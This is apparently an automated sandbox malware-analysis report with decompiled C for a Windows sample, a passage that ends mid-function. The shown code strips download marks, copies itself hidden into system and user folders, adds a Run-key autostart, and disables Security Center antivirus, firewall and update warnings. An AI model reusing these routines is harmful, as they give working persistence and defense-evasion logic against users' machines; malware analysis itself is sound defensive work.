                                                                                                                                                                                                                                                                                    • htons.WS2_32(00000050), ref: 0040956D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409500: inet_addr.WS2_32(00409581), ref: 0040950A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409500: gethostbyname.WS2_32(?), ref: 0040951D
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040958D
                                                                                                                                                                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 004095A6
                                                                                                                                                                                                                                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 004095D8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • www.update.microsoft.com, xrefs: 00409577
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                                                                                                                                                                    • String ID: www.update.microsoft.com
                                                                                                                                                                                                                                                                                    • API String ID: 4063137541-1705189816
                                                                                                                                                                                                                                                                                    • Opcode ID: 3133bfd0ff6c1cc1bf6a6429f4e0b0bd3f77c76321baf638f74cae633aa49c80
                                                                                                                                                                                                                                                                                    • Instruction ID: 389a469d72f566baadd69971dc4dec0fd14d74987819c9d890e36e211f91e18c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3133bfd0ff6c1cc1bf6a6429f4e0b0bd3f77c76321baf638f74cae633aa49c80
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD210EB5D14309ABCB04DFE4D846AEFBBB4AF48310F108169E505F3390E7745A44CB69
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                    			E0040A870(void* __ecx, BYTE* _a4, int _a8) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				char* _t6;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t1 =  &_v8; // 0x406545
                                                                                                                                                                                                                                                                                    				_t6 = _t1;
                                                                                                                                                                                                                                                                                    				__imp__CryptAcquireContextW(_t6, 0, 0, 1, 0xf0000040, __ecx); // executed
                                                                                                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                                                                                                    					_t4 =  &_v8; // 0x406545
                                                                                                                                                                                                                                                                                    					CryptGenRandom( *_t4, _a8, _a4);
                                                                                                                                                                                                                                                                                    					_t5 =  &_v8; // 0x406545
                                                                                                                                                                                                                                                                                    					return CryptReleaseContext( *_t5, 0);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t6;
                                                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                                                    0x0040a87f
                                                                                                                                                                                                                                                                                    0x0040a87f
                                                                                                                                                                                                                                                                                    0x0040a883
                                                                                                                                                                                                                                                                                    0x0040a88b
                                                                                                                                                                                                                                                                                    0x0040a895
                                                                                                                                                                                                                                                                                    0x0040a899
                                                                                                                                                                                                                                                                                    0x0040a8a1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040a8a5
                                                                                                                                                                                                                                                                                    0x0040a8ae

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(Ee@,00000000,00000000,00000001,F0000040,?,?,0040A8C9,Ee@,00000004,?,?,0040A8FE,000000FF), ref: 0040A883
                                                                                                                                                                                                                                                                                    • CryptGenRandom.ADVAPI32(Ee@,?,00000000,?,?,0040A8C9,Ee@,00000004,?,?,0040A8FE,000000FF), ref: 0040A899
                                                                                                                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(Ee@,00000000,?,?,0040A8C9,Ee@,00000004,?,?,0040A8FE,000000FF), ref: 0040A8A5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                                                    • String ID: Ee@
                                                                                                                                                                                                                                                                                    • API String ID: 1815803762-3880142923
                                                                                                                                                                                                                                                                                    • Opcode ID: eda8b9e6150e8489936fffc678bcc37347e2bbaac9c88bad9fce2d1065103978
                                                                                                                                                                                                                                                                                    • Instruction ID: 1edff0947e8a0bec857b7d5bc171d56b6abde249d8757a471d495e886690916f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eda8b9e6150e8489936fffc678bcc37347e2bbaac9c88bad9fce2d1065103978
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47E01275650308FBDB14DBD1EC49F9A777CAB48740F108154B709A7284DAB5EA408768
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                                                                                                                                                    			E0040DD70(void* __edi) {
                                                                                                                                                                                                                                                                                    				short _v14;
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				short _v26;
                                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t27 = __edi;
                                                                                                                                                                                                                                                                                    				_t24 = E00408B00(0x24);
                                                                                                                                                                                                                                                                                    				 *_t24 = 0x756470;
                                                                                                                                                                                                                                                                                    				 *(_t24 + 4) = 1;
                                                                                                                                                                                                                                                                                    				_t15 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                    				 *(_t24 + 0x10) = _t15;
                                                                                                                                                                                                                                                                                    				__imp__#23(2, 2, 0x11); // executed
                                                                                                                                                                                                                                                                                    				 *(_t24 + 8) = _t15;
                                                                                                                                                                                                                                                                                    				if(_t15 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					E0040DD00(_t24, __edi);
                                                                                                                                                                                                                                                                                    					_t24 = 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_t24 == 0) {
                                                                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                                                                    					return _t24;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_v26 = 0;
                                                                                                                                                                                                                                                                                    					_v22 = 0;
                                                                                                                                                                                                                                                                                    					_v18 = 0;
                                                                                                                                                                                                                                                                                    					_v14 = 0;
                                                                                                                                                                                                                                                                                    					_v28 = 2;
                                                                                                                                                                                                                                                                                    					__imp__#2( *(_t24 + 8),  &_v28, 0x10); // executed
                                                                                                                                                                                                                                                                                    					if(2 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t24 + 0xc)) = _v20;
                                                                                                                                                                                                                                                                                    						_t20 = CreateThread(0, 0, E0040DAD0, _t24, 0, 0); // executed
                                                                                                                                                                                                                                                                                    						 *(_t24 + 0x14) = _t20;
                                                                                                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						E0040DD00(_t24, _t27);
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    0x0040dd70
                                                                                                                                                                                                                                                                                    0x0040dd82
                                                                                                                                                                                                                                                                                    0x0040dd88
                                                                                                                                                                                                                                                                                    0x0040dd8e
                                                                                                                                                                                                                                                                                    0x0040dd95
                                                                                                                                                                                                                                                                                    0x0040dda1
                                                                                                                                                                                                                                                                                    0x0040dda4
                                                                                                                                                                                                                                                                                    0x0040ddaa
                                                                                                                                                                                                                                                                                    0x0040ddb0
                                                                                                                                                                                                                                                                                    0x0040ddb2
                                                                                                                                                                                                                                                                                    0x0040ddb7
                                                                                                                                                                                                                                                                                    0x0040ddb7
                                                                                                                                                                                                                                                                                    0x0040ddbb
                                                                                                                                                                                                                                                                                    0x0040de1a
                                                                                                                                                                                                                                                                                    0x0040de20
                                                                                                                                                                                                                                                                                    0x0040ddbd
                                                                                                                                                                                                                                                                                    0x0040ddbf
                                                                                                                                                                                                                                                                                    0x0040ddc3
                                                                                                                                                                                                                                                                                    0x0040ddc7
                                                                                                                                                                                                                                                                                    0x0040ddcb
                                                                                                                                                                                                                                                                                    0x0040dddb
                                                                                                                                                                                                                                                                                    0x0040dde5
                                                                                                                                                                                                                                                                                    0x0040ddee
                                                                                                                                                                                                                                                                                    0x0040de0e
                                                                                                                                                                                                                                                                                    0x0040de11
                                                                                                                                                                                                                                                                                    0x0040de17
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ddf0
                                                                                                                                                                                                                                                                                    0x0040ddf0
                                                                                                                                                                                                                                                                                    0x0040ddfb
                                                                                                                                                                                                                                                                                    0x0040ddfb
                                                                                                                                                                                                                                                                                    0x0040ddee

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040BF1E,00000000), ref: 0040DD95
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040DDA4
                                                                                                                                                                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 0040DDE5
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: SetEvent.KERNEL32(?,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD11
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: WaitForSingleObject.KERNEL32(?,000000FF,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD1D
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: CloseHandle.KERNEL32(?), ref: 0040DD27
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000DAD0,00000000,00000000,00000000), ref: 0040DE11
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3943618503-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f8f3b0d91992a3f05bf20d74a040dd3b5de6542fa6eed3ed5fb2aa002f931ea1
                                                                                                                                                                                                                                                                                    • Instruction ID: a1f51b83e62fd1e5ac6bfc854ac0cad300f812e19a803ea918e078540f5b95b0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8f3b0d91992a3f05bf20d74a040dd3b5de6542fa6eed3ed5fb2aa002f931ea1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9611C870A40300AFE7009FB49C86B577AA0EF44710F50897AFA08DE2D1D2F4D8488756
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 0 405e10-405e2e Sleep 1 405e38-405e44 0->1 2 405e46-405e53 PathFileExistsW 1->2 3 405e98-405eb8 CreateMutexA GetLastError 1->3 4 405e55-405e81 CopyFileW MoveFileA MoveFileW 2->4 5 405e87-405e96 2->5 6 405ec2-405f47 GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 3->6 7 405eba-405ebc ExitProcess 3->7 4->5 5->1 8 405f4d-405f66 6->8 9 405fb3-405fb8 8->9 10 405f68-405f70 8->10 13 405fbe-405fd1 9->13 11 405f72-405f8d 10->11 12 405fa7-405fb1 10->12 11->9 14 405f8f-405fa5 11->14 12->13 15 405fd7-405fe2 call 40d0f0 13->15 16 40623a-406265 Sleep RegOpenKeyExA 13->16 14->8 14->12 24 405fe4-405fe6 ExitProcess 15->24 25 405fec-40603a ExpandEnvironmentStringsW wsprintfW CopyFileW 15->25 18 406351-406371 RegOpenKeyExA 16->18 19 40626b-40634b RegSetValueExA * 7 RegCloseKey 16->19 21 406377-406457 RegSetValueExA * 7 RegCloseKey 18->21 22 40645d-406472 Sleep call 40b1c0 18->22 19->18 21->22 29 4065c8-4065d1 22->29 30 406478-4065c0 WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 4045f0 call 40d020 call 405ba0 CreateEventA call 40a8f0 call 40baf0 call 409d40 call 40bba0 * 4 22->30 27 406040-40606f SetFileAttributesW RegOpenKeyExW 25->27 28 406119-40615b Sleep wsprintfW CopyFileW 25->28 32 406075-40608a 27->32 33 4060fa-40610f call 40d390 27->33 28->16 31 406161-406190 SetFileAttributesW RegOpenKeyExW 28->31 67 4065c5 30->67 35 406196-4061ab 31->35 36 40621b-406230 call 40d390 31->36 38 406090-4060af 32->38 33->28 46 406111-406113 ExitProcess 33->46 42 4061b1-4061d0 35->42 36->16 51 406232-406234 ExitProcess 36->51 38->38 45 4060b1-4060f4 RegSetValueExW RegCloseKey 38->45 42->42 48 4061d2-406215 RegSetValueExW RegCloseKey 42->48 45->33 48->36 67->29
                                                                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                    			_entry_() {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                                                                                                    				int _v532;
                                                                                                                                                                                                                                                                                    				int _v536;
                                                                                                                                                                                                                                                                                    				char _v1060;
                                                                                                                                                                                                                                                                                    				void* _v1064;
                                                                                                                                                                                                                                                                                    				char _v1588;
                                                                                                                                                                                                                                                                                    				short _v2108;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2112;
                                                                                                                                                                                                                                                                                    				short _v2636;
                                                                                                                                                                                                                                                                                    				void* _v2640;
                                                                                                                                                                                                                                                                                    				char _v3044;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v3048;
                                                                                                                                                                                                                                                                                    				int _v3052;
                                                                                                                                                                                                                                                                                    				short _v3054;
                                                                                                                                                                                                                                                                                    				short _v3056;
                                                                                                                                                                                                                                                                                    				int _v3060;
                                                                                                                                                                                                                                                                                    				int _v3064;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v3068;
                                                                                                                                                                                                                                                                                    				intOrPtr _v3072;
                                                                                                                                                                                                                                                                                    				short _v3074;
                                                                                                                                                                                                                                                                                    				signed int _v3080;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v3084;
                                                                                                                                                                                                                                                                                    				intOrPtr _v3088;
                                                                                                                                                                                                                                                                                    				short _v3090;
                                                                                                                                                                                                                                                                                    				signed int _v3096;
                                                                                                                                                                                                                                                                                    				void* _t121;
                                                                                                                                                                                                                                                                                    				int _t129;
                                                                                                                                                                                                                                                                                    				long _t130;
                                                                                                                                                                                                                                                                                    				long _t132;
                                                                                                                                                                                                                                                                                    				signed char _t133;
                                                                                                                                                                                                                                                                                    				void* _t142;
                                                                                                                                                                                                                                                                                    				intOrPtr _t145;
                                                                                                                                                                                                                                                                                    				intOrPtr _t149;
                                                                                                                                                                                                                                                                                    				signed char _t192;
                                                                                                                                                                                                                                                                                    				signed char _t203;
                                                                                                                                                                                                                                                                                    				int _t210;
                                                                                                                                                                                                                                                                                    				short _t215;
                                                                                                                                                                                                                                                                                    				intOrPtr _t219;
                                                                                                                                                                                                                                                                                    				short _t245;
                                                                                                                                                                                                                                                                                    				intOrPtr _t253;
                                                                                                                                                                                                                                                                                    				intOrPtr _t254;
                                                                                                                                                                                                                                                                                    				void* _t278;
                                                                                                                                                                                                                                                                                    				void* _t279;
                                                                                                                                                                                                                                                                                    				void* _t286;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				Sleep(0xbb8); // executed
                                                                                                                                                                                                                                                                                    				_v536 = 0;
                                                                                                                                                                                                                                                                                    				_v2112 = 0x235a;
                                                                                                                                                                                                                                                                                    				while(_v536 < _v2112) {
                                                                                                                                                                                                                                                                                    					_t210 = PathFileExistsW(L"2393737939739"); // executed
                                                                                                                                                                                                                                                                                    					if(_t210 != 0) {
                                                                                                                                                                                                                                                                                    						CopyFileW(L"297973937,", L"33973397337", 0);
                                                                                                                                                                                                                                                                                    						MoveFileA("337372927", "2282688262");
                                                                                                                                                                                                                                                                                    						MoveFileW(L"038038", L"333383737");
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v536 = _v536 + 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t121 = CreateMutexA(0, 0, "2u9o0b7n"); // executed
                                                                                                                                                                                                                                                                                    				_v2640 = _t121;
                                                                                                                                                                                                                                                                                    				if(GetLastError() != 0xb7) {
                                                                                                                                                                                                                                                                                    					_v1064 = 0;
                                                                                                                                                                                                                                                                                    					_v528 = 1;
                                                                                                                                                                                                                                                                                    					GetModuleFileNameW(0, 0x4169d8, 0x105);
                                                                                                                                                                                                                                                                                    					_v532 = PathFindFileNameW(0x4169d8);
                                                                                                                                                                                                                                                                                    					wsprintfW( &_v524, L"%s:Zone.Identifier", 0x4169d8);
                                                                                                                                                                                                                                                                                    					_t279 = _t278 + 0xc;
                                                                                                                                                                                                                                                                                    					DeleteFileW( &_v524); // executed
                                                                                                                                                                                                                                                                                    					ExpandEnvironmentStringsW(L"%userprofile%",  &_v2636, 0x104);
                                                                                                                                                                                                                                                                                    					_v3048 = 0x414bf0;
                                                                                                                                                                                                                                                                                    					_v3052 = _v532;
                                                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                                                    						_t129 = _v3052;
                                                                                                                                                                                                                                                                                    						_t215 =  *_t129;
                                                                                                                                                                                                                                                                                    						_v3054 = _t215;
                                                                                                                                                                                                                                                                                    						if(_t215 !=  *_v3048) {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_v3054 == 0) {
                                                                                                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                                                                                                    							_v3060 = 0;
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							_v3064 = _v3060;
                                                                                                                                                                                                                                                                                    							if(_v3064 == 0) {
                                                                                                                                                                                                                                                                                    								L31:
                                                                                                                                                                                                                                                                                    								Sleep(0x1f4); // executed
                                                                                                                                                                                                                                                                                    								_t130 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006,  &_v1064); // executed
                                                                                                                                                                                                                                                                                    								if(_t130 == 0) {
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4); // executed
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4); // executed
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4); // executed
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4); // executed
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4); // executed
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4); // executed
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4); // executed
                                                                                                                                                                                                                                                                                    									RegCloseKey(_v1064); // executed
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t132 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center\\Svc", 0, 0x20006,  &_v1064); // executed
                                                                                                                                                                                                                                                                                    								if(_t132 == 0) {
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								Sleep(0x1f4); // executed
                                                                                                                                                                                                                                                                                    								_t133 = E0040B1C0(); // executed
                                                                                                                                                                                                                                                                                    								if((_t133 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    									__imp__#115(0x202,  &_v3044); // executed
                                                                                                                                                                                                                                                                                    									wsprintfW("C:\Users\Albus\tbnds.dat", L"%s\\tbnds.dat",  &_v2636);
                                                                                                                                                                                                                                                                                    									wsprintfW("C:\Users\Albus\tbcmds.dat", L"%s\\tbcmds.dat",  &_v2636);
                                                                                                                                                                                                                                                                                    									CreateThread(0, 0, E004043F0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    									Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    									CreateThread(0, 0, E004054A0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    									Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    									CreateThread(0, 0, E00405CF0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    									Sleep(0x2710); // executed
                                                                                                                                                                                                                                                                                    									E004045F0(); // executed
                                                                                                                                                                                                                                                                                    									_t142 = E0040D020(); // executed
                                                                                                                                                                                                                                                                                    									E00405BA0(_t142,  &_v2636); // executed
                                                                                                                                                                                                                                                                                    									 *0x416e0c = CreateEventA(0, 1, 0, 0); // executed
                                                                                                                                                                                                                                                                                    									_t145 = E0040A8F0( &_v2636); // executed
                                                                                                                                                                                                                                                                                    									 *0x416e14 = _t145;
                                                                                                                                                                                                                                                                                    									 *0x416e10 = E0040BAF0( &_v2636); // executed
                                                                                                                                                                                                                                                                                    									E00409D40(); // executed
                                                                                                                                                                                                                                                                                    									_t253 =  *0x416e10; // 0x1eb1d60
                                                                                                                                                                                                                                                                                    									E0040BBA0(_t253, 0, E0040BFB0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    									_t149 =  *0x416e10; // 0x1eb1d60
                                                                                                                                                                                                                                                                                    									E0040BBA0(_t149, 0, E0040BF10, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    									_t219 =  *0x416e10; // 0x1eb1d60
                                                                                                                                                                                                                                                                                    									E0040BBA0(_t219, 0, E0040BAA0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    									_t254 =  *0x416e10; // 0x1eb1d60
                                                                                                                                                                                                                                                                                    									E0040BBA0(_t254, 0, E0040B8A0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if((E0040D0F0() & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                    								ExpandEnvironmentStringsW(L"%windir%",  &_v2108, 0x104);
                                                                                                                                                                                                                                                                                    								wsprintfW( &_v1588, L"%s\\%s",  &_v2108, 0x414bf0);
                                                                                                                                                                                                                                                                                    								_t286 = _t279 + 0x10;
                                                                                                                                                                                                                                                                                    								if(CopyFileW(0x4169d8,  &_v1588, 0) == 0) {
                                                                                                                                                                                                                                                                                    									L24:
                                                                                                                                                                                                                                                                                    									Sleep(0x1f4);
                                                                                                                                                                                                                                                                                    									wsprintfW( &_v1060, L"%s\\%s",  &_v2636, 0x414bf0);
                                                                                                                                                                                                                                                                                    									_t279 = _t286 + 0x10;
                                                                                                                                                                                                                                                                                    									if(CopyFileW(0x4169d8,  &_v1060, 0) == 0) {
                                                                                                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									SetFileAttributesW( &_v1060, 3);
                                                                                                                                                                                                                                                                                    									if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                                                                                                                                                                                                                    										L29:
                                                                                                                                                                                                                                                                                    										_t192 = E0040D390( &_v1060);
                                                                                                                                                                                                                                                                                    										_t279 = _t279 + 4;
                                                                                                                                                                                                                                                                                    										if((_t192 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                    											goto L31;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										ExitProcess(0);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_v3084 =  &_v1060;
                                                                                                                                                                                                                                                                                    									_v3088 = _v3084 + 2;
                                                                                                                                                                                                                                                                                    									do {
                                                                                                                                                                                                                                                                                    										_v3090 =  *_v3084;
                                                                                                                                                                                                                                                                                    										_v3084 = _v3084 + 2;
                                                                                                                                                                                                                                                                                    									} while (_v3090 != 0);
                                                                                                                                                                                                                                                                                    									_v3096 = _v3084 - _v3088 >> 1;
                                                                                                                                                                                                                                                                                    									RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1060, _v3096 + _v3096 + 2);
                                                                                                                                                                                                                                                                                    									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                                    									goto L29;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								SetFileAttributesW( &_v1588, 3);
